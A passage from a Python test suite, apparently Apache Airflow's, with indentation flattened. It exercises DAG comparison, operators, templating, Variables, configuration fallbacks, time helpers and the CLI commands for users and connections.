dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEquals(context['ds'], '2015-01-01')
self.assertEquals(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEquals(context['next_ds'], '2015-01-02')
self.assertEquals(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEquals(context['prev_ds'], '2014-12-31')
self.assertEquals(context['prev_ds_nodash'], '20141231')
self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEquals(context['ts_nodash'], '20150101T000000+0000')
self.assertEquals(context['yesterday_ds'], '2014-12-31')
self.assertEquals(context['yesterday_ds_nodash'], '20141231')
self.assertEquals(context['tomorrow_ds'], '2015-01-02')
self.assertEquals(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
